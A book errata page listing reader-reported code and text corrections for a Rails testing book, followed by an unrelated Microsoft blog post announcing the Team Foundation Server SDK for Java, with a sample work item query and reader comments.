page: 105 Paper page: 91 Currently this: ```` it "doesn't allow creation of a task without a size" do creator = CreatesProject.new(name: "Test", task_string: "size:no_size") creator.create expect(creator.project.tasks.map(&:title)).to eq(["size"]) end ``` and I think it should be something like this ` it "doesn't allow creation of a task without a size" do creator = CreatesProject.new(name: "Test", task_string: "size:3\nno_size:no_size") creator.create expect(creator.project.tasks.map(&:title)).to eq(["size"]) end `--Sam Joseph - Reported in: P1.0 (07-May-18) Paper page: 114 First bullet: "attributes_for" is incorrectly written as "attribute_for". --Yong Bakos - Reported in: P1.0 (25-Jun-19) PDF page: 114 *attribute_for* should be *attributes_for*--Marc Assens - Reported in: P1.0 (03-Jan-19) PDF page: 117 > My preferred strategy is to not specify attributes in factories at all. If I need > associated objects in a specific test, I explicitly add them to the test at the > point they’re needed. It should probably read _is to not specify associations in factories at all_--Štěpán Pilař - Reported in: P1.0 (07-May-18) Paper page: 117 Second paragraph: "My preferred strategy is to not specify attributes" should be: "My preferred strategy is to not specify associations" --Yong Bakos - Reported in: P1.0 (07-May-18) Paper page: 121 The state of the project_spec "estimates" section does not match the traits created in this chapter, and so applying those traits causes tests to fail. See page 113 (data/01/spec/models/project_spec.rb) for the starting state. While the book indicates a subtle change (from 5 to 6 in the test) it should also indicate a change to the following test: it "knows its projected days remaining" do expect(project.projected_days_remaining).to eq(42) end (Was 35.) --Yong Bakos - Reported in: P1.0 (10-May-18) Paper page: 122 When I ran bin/factory_bot.rb, I got a different notification for panic: * panic - uninitialized constant Panic (NameError) from /Users/aaron/.rbenv/versions/2.2.2/lib/ruby/gems/2.2.0/gems/factory_bot-4.8.2/lib/factory_bot.rb:69:in `lint' from bin/factory_bot.rb:5:in `<main>' The book shows the same notification as for "trivial", i.e. undefined method `due_date='--Aaron Kelton - Reported in: P1.0 (12-May-18) Paper page: 133 The second code listing is both vague and includes a technical error. This: twin = double(first_name: "Paul", weight: 100) twin = double allow(twin).to receive(first_name).and_return("Paul") allow(twin).to receive(weight).and_return(100) Should be: twin = double(first_name: "Paul", weight: 100) # Equivalent to: twin = double allow(twin).to receive(:first_name).and_return("Paul") allow(twin).to receive(:weight).and_return(100) Note the breaking up of the code with a comment, and the use of symbols as arguments to 'receive'. --Yong Bakos - Reported in: P1.0 (04-Jan-19) PDF page: 140 You also might see the use of dependency injection, where the behavior of CreatesProject creating an instance of Project would be set as a variable at runtime—usually something like def initialize(initialize(name: "", task_string: "", class_to_create: Project). Allowing the class to be specified dynamically allows the use of a class double or fake class in testing. Double _initialize_--Štěpán Pilař - Reported in: P1.0 (12-May-18) Paper page: 143 Code listing mocks/01/spec/controllers/projects_controller_spec.rb should end with one more expectation: expect(workflow).to have_received(:create) In order to be aligned with the third bullet point on page 143, which states, "That the controller calls create on the return value of CreatesProject.new." --Yong Bakos - Reported in: P1.0 (15-Sep-18) PDF page: 143 States “The use of instance_double to create the test double...”, code block uses instance_spy. - Reported in: P1.0 (12-May-18) Paper page: 145 The backticks and italics are not necessary for the initial code snippet: allow(project).to receive(:method).and_yield("arg") --Yong Bakos - Reported in: P1.0 (09-Mar-18) PDF page: 165 After scoping the order of project tasks, I had a few unrelated tests fail. I ended up needing to add inverse_of to the relationships to make it work. > /app/models/project.rb has_many :tasks, -> { order "project_order ASC" }, dependent: :destroy became > /app/models/project.rb has_many :tasks, -> { order(project_order: :asc) }, dependent: :destroy, inverse_of: :project > /app/models/task.rb belongs_to :project, inverse_of: :tasks--Joel Schneider - Reported in: P1.0 (17-May-18) Paper page: 166 it "makes 1... in an entry project" Should be it "makes 1... in an empty project" --Yong Bakos - Reported in: P1.0 (17-May-18) Paper page: 166 The controller implementation on this page, integration/02/app/controllers/task_controller.rb should omit: - the before_action - the methods up and down As they are intended to be introduced on page 170, in a listing for the same controller. --Yong Bakos - Reported in: P1.0 (17-May-18) Paper page: 167 On this page (167), the listing for integration/02/spec/models/task_spec.rb should _only_ contain a single test, "can determine that a task is first or last." The remaining tests are introduced on page 169. The extra tests are inconsistent with the statement following the code listing on page 168, "That's more assertions than I would normally place in a single test." In addition, the implementation that follows does not enable the reader to have the unit tests pass - as there are more tests than the implementation addresses. Solution: all the tests in that listing on page 167 should be removed except for "can determine that a task is first or last." --Yong Bakos - Reported in: P1.0 (20-May-18) Paper page: 171 Ok, this technical error is a major one. As of page 171, one major omission is that, in chapter 8, the author does not guide the user through an important addition to CreatesProject#convert_string_to_tasks. What was: def convert_string_to_tasks task_string.split("\n").map do |task| title, size_string = task.split(':') Task.new(title: title, size: size_as_integer(size_string)) end end Should be, as evidenced by the code download in js_integration/01: def convert_string_to_tasks task_string.split("\n").map.with_index do |one_task, index| title, size_string = one_task.split(":") Task.new(title: title, size: size_as_integer(size_string), project_order: index + 1) end end Without this, the DOM id's of the task elements after creating a *new* project with initial tasks is "task_". You can verify this in the code in integration/02. Run the server, add a project, view the source, and notice the incorrect DOM ids. This should be incorporated somewhere in chapter 8 before the "Retrospective" section, and enhanced under test. --Yong Bakos - Reported in: P1.0 (19-May-18) Paper page: 173 Here is features_add_task.feature should be: Here is features/add_task.feature --Yong Bakos - Reported in: P1.0 (19-May-18) Paper page: 174 In the cucumber pages, although Rappin states the version of cucumber and cucumber-rails used, it is important to note that cucumber has changed the default step definitions to use strings instead of regexes. As such, all the code excerpts that include the classic default cucumber regexes is inconsistent with what the reader sees when working with cucumber in this chapter. For consistency, I suggest using strings rather than regexes to match the default cucumber output for pending step definitions. --Yong Bakos - Reported in: P1.0 (09-Mar-18) PDF page: 174 The cucumber feature test is in the "features" directory not the "feature" directory. It should be "cucumber features/add_task.feature" instead of "cucumber feature/add_task.feature".--Joel Schneider - Reported in: P1.0 (19-May-18) Paper page: 178 The Scenario Outline on pages 178-179 embolden the word in, with no explanation about why. This should be of normal weight, so as to not mislead the reader. --Yong Bakos - Reported in: P1.0 (20-May-18) Paper page: 183 In the code listing, the first tr within tbody is inconsistent: <tr id="task_<%= task.project_order %>" data-task-id=<%= task.id >> Should be: <tr id="task_<%= task.project_order %>" data- And the following td should be typeset in bold/grey markup. --Yong Bakos - Reported in: P1.0 (20-May-18) Paper page: 186 When you generated the Rails application you included Webpacker... But we did not, nor does the author prompt us to way back in chapter 2 where we: rails new . Instead of: rails new . --webpack As such, this section should explicitly describe modifying the Gemfile: gem 'webpacker' Before running 'rails webpacker:install'. --Yong Bakos - Reported in: P1.0 (24-May-18) Paper page: 199 The last test description reads: "handles asking for the bottom task to move up" But should be: "handles asking for the bottom task to move down" --Yong Bakos - Reported in: P1.0 (09-Mar-18) PDF page: 204 Type in test name "uses the fake laoder to load a Project". It should be "uses the fake loader to load a Project".--Joel Schneider - Reported in: P1.0 (27-May-18) Paper page: 215 If the reader has been following along with the text up until page 203, he is found abandoned in completing the app to match the author's. One must then rely on the provided source code. The problem is that integrating js_jasmine/03 with the text has a few discrepancies, causing the TasksController up/down methods to return 404s due to the url being sent in the ajax request, which uses the task order as the PK id of the task id param to find on the server-side. In other words, the app in js_jasmine/03 is actually broken. To see how: 1) Visit /projects/new and create a new project with two tasks a and b. 2) Visit /projects/2 and see the project, with the tasks in order: a, b. 3) Reorder the tasks using the button, and see that they are visually re-ordered: b, a. 4) Reload the page, and see that the order is unchanged: a, b. --Yong Bakos - Reported in: P1.0 (18-Mar-18) PDF page: 215 Going forward in the code examples I found that the code was missing on previous chapters, but included in later chapters, and that way I was able to make the web app works successfully. I also found that the swap_order_with method has an error, to reproduce it simply add 3 tasks on a project, then start the rails and webpack server then click "Up" on the second element on the list, you will see a backend exception undefined method project_order for nil:NilClass.--victor hazbun - Reported in: P1.0 (18-Mar-18) PDF page: 217 At this point of the book, I found that front-end has a critical error: the DOM task_#id was actually the project_order you can notice this on the project.js file, the functionloadFromData is creating new instances of Task and assigning the id as the project_order. This has to be a joke... Since the core of the app / tests are based on the ID the hole tests breaks when you put the correct code, which is the task ID.--victor hazbun - Reported in: P1.0 (18-Mar-18) PDF page: 225 After reaching the section "Connecting the JavaScript to the Server Code", I ran the rails server and the webpacker dev server and noticed that the "projects.js" was not working... The dom does not have a class ".task-table". Also this book have many errors everywhere and it should not been on release since it is not ready to be sold. The tests passes even when the app is not working as intended, I though the TDD was a way to make your code work in a solid way but I realize after reading the 60% that this is false. Tests that passes with a broken app? Come on.--victor hazbun - Reported in: P1.0 (28-May-18) Paper page: 226 First paragraph: ...a have_http_matcher should be: ...a have_http_status matcher--Yong Bakos - Reported in: P1.0 (28-May-18) Paper page: 230 In task_requests_spec.rb, the let statement is the first time a factory is used to _create_ a task that has no project. This will fail, since the belongs_to relationship is required. Looking back at the provided book code, the author added required: false to the Task class belongs_to declaration way back in integration/02. However, this is never mentioned in the text, and is actually never necessary until chapter 11 - where a Task is created independent of a project for the first time. As such, the test raises an error due to the let statement, and the reader should add required: false to the Task class belongs_to declaration. The text should either suggest the change here; or back in chapter 6 (factories) as this is the context where developers will experience a similar error in their work with factories; or back in chapter 8, where the author makes the change to the Task class in the book's code. --Yong Bakos - Reported in: P1.0 (28-May-18) Paper page: 230 The task_requests_spec.rb on page 230 should only introduce the testing of the false case, as the text only refers to it, and asserts that the test would pass (but both tests do not). In addition, on the next page, 231, the author presents the second test, which is now redundant. Suggestion: on page 230, remove the "sends email when task is completed" test from the code listing. --Yong Bakos - Reported in: P1.0 (28-May-18) Paper page: 231 First paragraph after the code listing, last sentence: Note that... completing the test here Should be: completing the task here. --Yong Bakos - Reported in: P1.0 (28-May-18) Paper page: 233 Second paragraph: back to the its source Should be: back to its source --Yong Bakos - Reported in: P1.0 (28-May-18) Paper page: 235 Fifth paragraph, last sentence: of the form render "projects/data_row, project: @project" Should be: render "projects/data_row", project: @project --Yong Bakos - Reported in: P1.0 (28-May-18) Paper page: 236 After implementing the use of the helper to pass the view test, the test fails due to a problem in Project#on_schedule? that raises an FloatDomainError: Infinity. The author fixes this in display/04/app/models/project.rb in the code download, but makes no mention of this in the text. Readers should change the implementation of Project#on_schedule? to : def on_schedule? return false if projected_days_remaining.infinite? return false if projected_days_remaining.nan? (Time.zone.today + projected_days_remaining) <= due_date end Suggestion: Present the error in the text, including a unit test and the new implementation. --Yong Bakos - Reported in: P1.0 (28-May-18) Paper page: 238 It would be cool to see just a little more in the Using Presenters section where the reader is guided to swap out the helper calls with the new ProjectPresenter, and see the tests pass. This would entail: projects_controller.rb#index: @projects = ProjectPresenter.from_project_list(Project.all) project_presenter.rb#name_with_status: Mark the string returned as htm_safe. app/views/projects/index.html.erb: Swap name_with_status(project) with project.name_with_status spec/views/projects/index.html.erb_spec.rb: Load ProjectPresenter objects for the view, eg: @projects = ProjectPresenter.from_project_list([on_schedule, behind_schedule]) Thanks for a great book! --Yong Bakos - Reported in: P1.0 (29-May-18) Paper page: 242 In the test_helper.rb code listing, the require statement: require 'mocha/mini_test' is deprecated, and should be: require 'mocha/minitest' --Yong Bakos - Reported in: B2.0 (04-Feb-18) PDF page: 245 When you run *racks* test -> (rails? rake?)--Ian Fleeton - Reported in: P1.0 (10-Mar-18) Paper page: 245 The line require test_helper ... as the test_helper file should be The line require "test_helper" ... as the test_helper.rb file --Yong Bakos - Reported in: P1.0 (30-May-18) Paper page: 247 In the code listing for test/models/project_test.rb, the description: "a project with no tests is estimated" Should be: "a project with no tasks is estimated" --Yong Bakos - Reported in: P1.0 (30-May-18) Paper page: 249 Similar to errata suggestion on page 242. The require statement: require 'mocha/mini_test' is deprecated, and should be: require 'mocha/minitest' --Yong Bakos - Reported in: P1.0 (04-Jun-18) Paper page: 257 Last paragraph. asset_select -> assert_select --Yong Bakos - Reported in: P1.0 (06-Jun-18) Paper page: 265 Fourth paragraph: "And the test passes as is, which should be a little suspicious." This is a little misleading, because running the suite displays a failure. The text is pointing to one specific test rather vaguely, and the code listing on page 264 has both the positive and negative log in tests. The ambiguity continues into the next paragraph: "... it means you've done only half the test... you haven't done the 'blocking miscreants' part." But we indeed did both halves, per the code listing on page 264. I suggest either breaking apart the code listing on 264, and putting the second test into the proper context on page 265; or removing paragraphs 4 and 5, as I quoted above. --Yong Bakos - Reported in: P1.0 (06-Jun-18) Paper page: 267 Last paragraph: "With that addition to the system tests..." should be: "With that addition to the system, controller and request tests..." Because without signing the user in, the specs will still fail: spec/controllers/projects_controller_spec.rb spec/requests/task_requests_spec.rb spec/system/add_task_spec.rb --Yong Bakos - Reported in: P1.0 (12-Jun-18) Paper page: 278 The first code listing, implementing #index, seems to forget that the previous implementation used a ProjectPresenter. This newest listing should fit that, and be presented as: def index @projects = ProjectPresenter.from_project_list(current_user.visible_projects) end --Yong Bakos - Reported in: P1.0 (12-Jun-18) Paper page: 281 It is not clear to the reader why the new tests on this page are depicted in the new file spec/requests/task_requests.rb rather than the existing spec/requests/task_requests_spec.rb. Furthermore, as the file does not end in "_spec.rb" rspec does not run it as part of the suite. --Yong Bakos - Reported in: P1.0 (12-Jun-18) Paper page: 281 There's a slightly larger technical oversight here. The code listing for task_requests.rb is invalid. You can prove this by running the test explicitly with rspec. The author / technical reviewers may have overlooked this as the tests in this file are not run with the complete suite do the the filename. The issue is that the controller is expecting params[:task][:project_id] but this test does not generate that request - the project_id is missing from the params hash it is posting. The line: post(tasks_path, params: {task: {name: "New Task", size: "3"}}) Should be: post(tasks_path, params: {task: {name: "New Task", size: "3", project_id: project.id}}) In both occurrences of the code listing for task_requests.rb. Lastly, these tests should just be added to the existing task_requests_spec.rb file. --Yong Bakos - Reported in: P1.0 (12-Jun-18) Paper page: 281 The tests here in the listing for spec/requests/task_requests.rb do not need the :js annotation - they don't rely at all on client-side javascript. They are request specs, and these tests do not rely on js. --Yong Bakos - Reported in: P1.0 (04-Feb-19) Paper page: 281 The second test should read ``` it "can not add a task to a project the user cannot see", :js do ``` negation in the second part is missing. --Štěpán Pilař - Reported in: P1.0 (16-Jun-18) Paper page: 288 Toward the end of the page, when describing the belongs_to declaration, the use of 'require: false' is incorrect. It should be 'required'. Better yet, it should be 'optional: true', which is the new approach for Rails 5. --Yong Bakos - Reported in: P1.0 (16-Jun-18) Paper page: 288 The has_many declaration at the end of the page is missing a colon after 'dependent'. It should read: has_many :tasks, dependent: :nullify --Yong Bakos - Reported in: P1.0 (16-Jun-18) Paper page: 289 The listing for shows_twitter_avatar_spec.rb uses the term "gravatar" which is an avatar service, and not relevant here. Should just be "avatar" as this feature is only using twitter avatars, not Gravatar ones. --Yong Bakos - Reported in: P1.0 (16-Jun-18) Paper page: 289 The test needs the :js annotation/option. Because in previous chapters the client now uses ajax to retrieve the tasks and append them to the dom. Otherwise the test fails because the dom element #task_1 does not exist. This test should be: test "shows an avatar", :js, :vcr do --Yong Bakos - Reported in: P1.0 (16-Jun-18) Paper page: 289 The url for the twitter profile image is not correct. As of this writing, Rappin's twitter avatar url is: ".../profile_images/950537388518006785/Wusx_fRo_400x400.jpg" --Yong Bakos - Reported in: P1.0 (15-Jul-18) Paper page: 334 The code listing at the bottom of the page has an incorrect require: require_relative "../active_record_test_helper" Should be: require_relative "../active_record_spec_helper" As the next code listing presents the contents of the file active_record_spec_helper.rb. --Yong Bakos - Reported in: P1.0 (16-Jul-18) Paper page: 334 The code listing at the bottom of the page is for test/models/project_test.rb but should be for spec/models/project_spec.rb. --Yong Bakos - Reported in: P1.0 (16-Jul-18) Paper page: 336 When making the same changes as the author, and running the tests in project_spec.rb, an error is raised due to not including the Sizeable module and the shared examples in spec/shared/sizeable_group.rb. --Yong Bakos
https://pragprog.com/titles/nrtest3/errata
CC-MAIN-2020-16
refinedweb
4,328
66.54
#include "libavcodec/avcodec.h" #include "avfilter.h" Go to the source code of this file. Definition in file buffersrc.h. Definition at line 31 of file buffersrc.h. Add buffer data in picref to buffer_src. Definition at line 102 of file buffersrc.c. Referenced by av_asrc_buffer_add_audio_buffer_ref(), av_buffersrc_add_frame(), av_buffersrc_buffer(), decode_audio(), decode_video(), sub2video_flush(), sub2video_push_ref(), and video_thread(). Add a buffer to the filtergraph s. Definition at line 159 of file buffersrc.c. Get the number of failed requests. A failed request is when the request_frame method is called while no frame is present in the buffer. The number is reset when a frame is added. Definition at line 165 of file buffersrc.c. Referenced by sub2video_heartbeat(), and transcode_from_filter(). Add a frame to the buffer source. Definition at line 97 of file buffersrc.c. Referenced by video_thread().
http://ffmpeg.org/doxygen/1.0/buffersrc_8h.html
CC-MAIN-2014-41
refinedweb
133
64.07
What I Learned at Work this Week: Updating a Jest Snapshot A big part of my job is writing “custom tag configurations” for my company’s clients. My company’s product is a “tag,” or a script that runs custom logic when it’s added to a client’s website. Since every website is different, our tag doesn’t always work perfectly out of the box, or by default, for every client. That’s why we’ll customize it to optimize for the location of various objects on their site. But every once in a while, we’ll find a consistent pattern over several sites that would allow us to deploy the same tag configuration with equal effectiveness. Something like that is a huge win because it means we can service two or more clients while only having to spend time writing one configuration. In this case, we would write a “preset” that could be applied to any company through our UI. Presets carry more weight than custom configurations because if they break, our product will stop working for a series of clients instead of just one. As you might expect, testing for presets is more robust than testing for custom configurations. This week, I had to make a change to a preset I had written, but when I tried to push my code, I saw that it was now failing a test. It turned out my new configuration wasn’t returning the correct snapshot, so if I wanted to make my change, I’d have to learn what that meant and how to fix it. Jest The first thing you’ll read on jestjs.io is that Jest is a delightful JavaScript Testing Framework with a focus on simplicity. And indeed, Jest is a framework we can use to test our JavaScript. Much like React, Jest was built and is maintained by Facebook. And so, as you might expect, there’s plenty of emphasis on how well it works with React. Since React is a framework that primarily builds dynamic user interfaces, it provides a unique challenge of how to test interactive displays. A traditional method that still has its advantages is to actually render a page, interact with it, and see what happens as part of your automated test. While this can be thorough, it is also time-consuming, even when automated. What’s worse, variability can make tests flaky, failing inconsistently when nothing in the code has changed. Dealing with this experience, the folks at Jest created a test based on snapshots. A Jest Snapshot The concept of a snapshot isn’t unique to Jest. For example, we could augment the previously mentioned test which renders a page by taking a digital “snapshot” of a rendered page and compared that to the page that renders whenever we try to push out a new change. But that still suffers from the issues of having to run most or all of your app whenever you have to test. In their documentation, the authors of Jest say that instead of rendering the graphical UI, which would require building the entire app, you can use a test renderer to quickly generate a serializable value for your React tree. In other words, we can save a component’s JSX as a string and then regenerate that component whenever we want to test. Here’s the example React that the documentation provides: import React from 'react'; import renderer from 'react-test-renderer'; import Link from '../Link.react';it('renders correctly', () => { const tree = renderer .create(<Link page="">Facebook</Link>) .toJSON(); expect(tree).toMatchSnapshot(); }); This assumes some knowledge of Jest syntax, but since it’s got a focus on simplicity, it’s not too difficult for us to follow. Everything is wrapped in an it function, which essentially defines our test. The function accepts two arguments, a string which is the name of the test and an anonymous function. That second argument sets a variable called tree that uses an imported object called renderer to run a create function. I haven’t seen the code behind renderer, but I think it’s safe to assume that it can be used to run JSX. We’re passing a Link component to the create function and them immediately converting the result to JSON, which will stringify it. What does that string look like? We can see it in the Jest document right after this snippet: exports[`renders correctly 1`] = ` <a className="normal" href="" onMouseEnter={[Function]} onMouseLeave={[Function]} > </a> `; It’s easy to miss the tick marks, but they indicate that everything we’re seeing here, from <a to </a> is a string. And if we go back to the last line of our sample test: expect(tree).toMatchSnapshot(); Our expectation is that the JSON conversion of our component “matches” the snapshot that’s generated when we first run Jest. Of course, the very first time we do this, they’ll always match, even if there’s a problem with the initial code. But if we feel good about our initial component, we’ll have a saved version of that which we can compare to all future iterations. Advantages and Disadvantages The advantages to this methodology are clear: it’s faster and more reliable than having to actually run our app, and our snapshot is pretty lightweight too. In a blog post linked in the Jest documentation, Ben McCormick shares a few shortcomings of the process that are also important to recognize: - Compared to assertion-based tests, snapshot testing is better for testing behavior that will change often, like where elements fit on our page as we develop it. If the behavior is expected to remain static over time, a classic assertion might be better, since we can describe it ourselves and it’s not so easy to update the test (more on updating snapshots later). - Snapshot tests won’t provide guidance when they fail. Instead, they just tell us that the string generated from our code doesn’t match the snapshot. Sometimes this is intentional and sometimes our subject is so complicated that a simple “this is different” doesn’t get us any closer to identifying why. - Ease of updating means we can more easily add a mistake to our code. There’s a single-line command to automatically update our Jest snapshots. Even better, when our tests fail, we’re given the option to make a selection that will update the snapshots in that moment. McCormick argues that this necessitates extra-thorough code review so that we don’t absent-mindedly update our snapshot when we instead should have refactored our code. Generating my Snapshot Jest provides pretty clear messaging on its tests, so I knew that my change was failing because my snapshot was out of date. As I mentioned, Jest provides a very easy way to address that issue: jest --updateSnapshot~ OR ~jest -u But in practice, my code is in a big monorepo with a bunch of different test files and snapshots, most of which have nothing to do with my code at all. I’ll be in a very bad situation if I mistakenly update one of those, so I have to be more specific with my command. If I want to see what commands I can run within my micro front end (MFE), I can check the package.json file. The file mapped a command test with jest, so I learned that I could run test -u to update my snapshot. I can specify a workspace in yarn and then add the test command, like so: yarn workspace @my-chosen-workspace test -u That last line was actually the main thing I learned at work this week, but I wanted to be able to better understand what a snapshot is and why it’s important. I feel like I’ve been hearing about testing forever, but it’s not an easy muscle to flex, especially when you’re iterating on existing code rather than starting from scratch. I’m not sure how much closer I am to writing a suite of Jest tests, but at least I understand the concept just a little bit better than I did before. Sources - Jest - Snapshot Testing, Jest - Jest 14.0: React Tree Snapshot Testing, Jest - Testing with Jest Snapshots: First Impressions, Ben McCormick - Use Jest’s Snapshot Testing Feature: Kent C. Dodds
https://mike-diaz006.medium.com/what-i-learned-at-work-this-week-updating-a-jest-snapshot-77376ddbf029
CC-MAIN-2022-05
refinedweb
1,398
57.4
From the beginning, extensibility of TFS was a core design principle – both to enable great 3rd party partners (like Ekobit, Urban Turtle, InCycle and more) and because almost all development shops have a need to customize the tools they use. As such we’ve provided a .NET library for interacting with and extending TFS from day one. And I’m always amazed with the things people are able to do with it. Today I am pleased to announce that we are now also extending this the Java side of the house. We have just made the Team Foundation Server SDK for Java available as a public download.. It includes: - Sample custom check-in policy - Sample custom work item controls (including a Radio Button control, Simple Button control, File Source drop-down and a sample External Source drop-down) - A set of sample console applications utilizing build and version control capabilities - A series of simple snippets demonstrating many aspects of the API including Work Items, Version Control and Build access. - Instructions for building and an Ant based build script to get you started. The license terms for the SDK are here. We’ve tried hard to make sure the license is as helpful as possible. You can use the SDK in your own applications redistributing the files listed for no charge. You can create applications that run on any of the operating systems supported by the API. There is no requirement that people must have Team Explorer Everywhere installed or even have a license for it – however you still need to make sure that anyone who is talking to TFS is licensed to use it (usually through a Client Access License). Using the API should be very familiar to developers who have had experience with the .NET API – however the TFS SDK for Java is a proper Java implementation so conventions will be slightly different (for example it uses standard Java style collections along with getters and setters just like you would expect). The following example show you how easy it is to query work items from Java using the SDK. import com.microsoft.tfs.core.TFSTeamProjectCollection; import com.microsoft.tfs.core.clients.workitem.WorkItem; import com.microsoft.tfs.core.clients.workitem.WorkItemClient; import com.microsoft.tfs.core.clients.workitem.project.Project; import com.microsoft.tfs.core.clients.workitem.query.WorkItemCollection; public class RunWorkItemQuery { public static void main(final String[] args) { TFSTeamProjectCollection tpc = new TFSTeamProjectCollection(""); Project project = tpc.getWorkItemClient().getProjects().get("Tailspin Toys"); WorkItemClient workItemClient = project.getWorkItemClient(); // Define the WIQL query. String wiqlQuery = "Select ID, Title from WorkItems where (State = 'Active') order by Title"; // Run the query and get the results. WorkItemCollection workItems = workItemClient.query(wiqlQuery); System.out.println("Found " + workItems.size() + " work items."); System.out.println(); // Write out the heading. System.out.println("ID\tTitle"); // Output the first 20 results of the query, allowing the TFS SDK to page // in data as required final int maxToPrint = 20; for (int i = 0; i < workItems.size(); i++) { if (i >= maxToPrint) { System.out.println("[...]"); break; } WorkItem workItem = workItems.getWorkItem(i); System.out.println(workItem.getID() + "\t" + workItem.getTitle()); } } } The team have been hard at work creating samples and snippets to help you learn how to use the API, however if you have any particular examples that you would like to see that they haven’t included then please let me know in the comments and we’ll see what we can do. Alternatively, head over to the forums where the team will be more than happy for the feedback and to assist where possible. Our very own Martin Woodward has also said that he’ll be blogging some examples and tutorials soon on his personal site. As I’ve said before, from day one we have wanted TFS to be an open platform upon which anyone can build their favorite development experiences. This SDK for Java is an important milestone for us in ensuring equal access to the same API’s that we have developed for our own use and will hopefully enable many people people to build on our platform. It’s also further evidence that we are serious about building a great ALM solution for truly heterogeneous teams. I’m very excited to see what people are going to do with the SDK. If you create something interesting then be sure to let me know. Brian Join the conversationAdd Comment Nice article Brian…gives gerat info. I will give it a try. Thanks – Naveen Hi, Is the Microsoft TestManager API is also included in the Java SDK? Please reply me this is really very important.Is there a way to add and get testplans and testcases by using the Java SDK for TFS. Please help me out. Jimmy Jimmy, no, the TestManager API is not included at this time. It's just the core Team Explorer APIs. Of course all the Test Case info can be accessed because they are just work items. Brian Jimmy – can you drop me a line (martinwo@microsoft.com) to talk about working with test work items? Thanks, Martin. Hey guys, I'm excited about using this – however, do you know if it is possible to use this SDK in an Android project? I was thinking of writing some TFS management tool for android phones, but when I run the Android project, i get a Java.lang.ClassNotFound for TFSConfigurationServer error during runtime. Let me know if you think you may know anything about this. Thanks a ton, Mitch This is great, when will there be a Cross-Platform C# (via Mono) version? The current C# one only works on Windows. Using this SDK, is it possible to retrieve information, like email addresses, for individuals who are assigned to a project in TFS? Hi Brian, We are trying to integrate our application with TFS using the SDK you described here. We use log4j in our application. When we load the code that loads this sdk we have conflicts in the way classes are loaded for log4j. We get the following error (…/Jar-hell-concerning-log).Is there a way to not have log4j bundled with this sdk jar? Also the log4j.properties in the jar indicates that com.microsoft.tfs-sdk.logging.config.Config should allow us to override the settings in log4j.properties. But we were not able to find the above class anywhere in the documentation as well as the web. Would be great it can share some thoughts on this. -Sudhindra Sudhindra – can you drop me a line (martinwo@microsoft.com). I'd love to help work out the issues you are having with the TFS SDK for Java. Thanks, Martin. Hi Brian, I love the idea of your TFS Java SDK, but one of my consultants has implemented it and has run into a performance problem that makes it impossible for us to use. It seems to be creating an entire in-memory database for each request. We have a forum posting social.msdn.microsoft.com/…/e69879dd-9ba4-4158-a6ad-c3ad2248742a which has zero responses, and Microsoft refuses to provide us with a paid support incident for this. Since I know your team take pride in their work, could you please follow up on our performance issue? Doug Practice Principal HP/Fortify Of course Douglas. I'm very sorry to hear that you've had these problems. We'll get them straighted out. Our Eclipse plug in is built on the Java SDK so I suspect there's some advice we can give on how to use it that will help. I also want to look into why support is refusing to help here – they should not be. Please email me at bharry at microsoft dot com and we'll get this sorted out. Brian Thanks, Brian! We really appreciate the help. The download link goes to the TFS SDK for TFS2012 – is there a TFS2010 version, or will this work with both versions? @kurakuraninja The TFS 2012 SDK for Java works against TFS 2012, TFS 2010, TFS 2008 and the Team Foundation Service Preview. Let me know how you get on. Hi, How can I implement Impersonation using TFS SDK 11? @Nitin – can you drop me a line martinwo@microsoft.com to talk about doing impersonation. I want to understand your scenario a bit better first to be able to guide you on the best way to handle it. Thanks! Martin. Hi, Is there a code snippet that uses Server URL to connect to TFS instead of collection URL? I am using TFS Java SDK 11.0 to connect to TFS 2008. I do not have project collection URL. Thanks in advance. Ajay, try a URL of "" and let me know how you get on. My email address is martinwo@microsoft.com • Can reports etc be uploaded at the relevant place/project in TFS server similar to QC ? so that wecan sync, upload end report in TFS • Can external web services be triggered from TFS ? These are the few doubts regarding TFS API • Can reports etc be uploaded at the relevant place/project in TFS server similar to QC ? so that we can sync, upload end report in TFS • Can external web services be triggered from TFS ? These are the doubts we search for in TFS API @Pradeep – The reports would typically be uploaded to SharePoint or SQL Server Reporting Services in a TFS installation, but yes there are full SOAP based API's for both so you can do that from Java no problem. This is not a feature of the TFS API thought (just like it is not a feature of the public .NET API for TFS). External web services can indeed be triggered from TFS. You pass a URL endpoint to the server and SOAP messages are sent to that URL for the configured events. As this is just SOAP you can consume these in many languages and frameworks – Java, Node, Rails, PHP, .NET, Python, Perl etc all work just fine as a way to receive the events. I once even sent messages using the SOAP eventing framework in TFS to a talking, dancing robot rabbit 😉 Hi, thank you so much for the project. Could you please share some guidelines on how to use the API for tests automation. Our goal is to add cucumber-jvm tests integration to our TFS server. Integration should conform to following scenario: 1. create TFS testcase using Gherking syntax 2. queue a build which will download testcase body to server, so we get cucumber .feature 3. trigger cucumber-jvm to execute this feature and update testcase results in TFS using this API Could you please give some directions, e.g. classes to look into. Dear This program is help for me to connect TFS with java on same domain but i needed assist how to set user name and password connecting with remote TFS on my java application using SDK 11.0.0 jar. Advance Thanks! Hey Dinesh, inside the SDK zip file, you'll find a samples folder that shows you how to pass in your credentials to the constructor when connecting to your team foundation server along with lots of other common getting started examples. Matin.)? Hi, thanks for your explication for TFS Java SDK. I have a question, which version of TFS server is supported by the TFS Java SDK? TFS2005, TFS 2008, TFS2010 or TFS2012? One more question, can the TFS Java SDK get commit information for version control with a workspace? Thanks in advance! @lolanaqin the SDK should work just fine against TFS 2010 and up, let us know if you encounter issues. It does have full access to TFVC Changeset data in the workspace. If you need data about a local Git repository then you should use jGit which the underlying API that Team Explorer Everywhere uses for local Git access. Does the TFS Java SDK support TFS2013? @lolanaqin Yes. TFS 2013, TFS 2013, TFS 2010 and VisualStudio.com are all supported Hello, thanks for the project. We faced with memory and performance issues when querying work items using java sdk. The problem is similar that Douglas described. Query (or connection) to work items takes a lot of time. Is there possible solution to configure java sdk to improve performance of work items queries? Thanks Is there a way to create project in tfs using SDK API? @Chhaya – the TFS Java SDK does not have an API to create a team project. One option (if your app runs on Windows) is to use the TFS Power Tools (visualstudiogallery.msdn.microsoft.com/f017b10c-02b4-4d6d-9845-58a06545627f) and run tfpt createproject. Will Any inputs for the below query?)? Sorry, currently there are no existing API available in TFS Java SDK to support this. One way to do this is to customize your TFS build process (See msdn.microsoft.com/…/dd647551.aspx) and develop some VS build workflow tasks to integrate with Jenkins and let TFS build triggers Jenkins and then aggregate Jenkins build/test results in TFS build summary/logs so that Jenkins results can be part of the TFS build summary, which can be viewed from TFS client (VS,TEE,etc). I want to download the complete code of a project, when i mention the URI and project name. Something like SVN checkout. Can you please tell me how do i go about it? @Rohith – see the VersionControlSample.java file in the 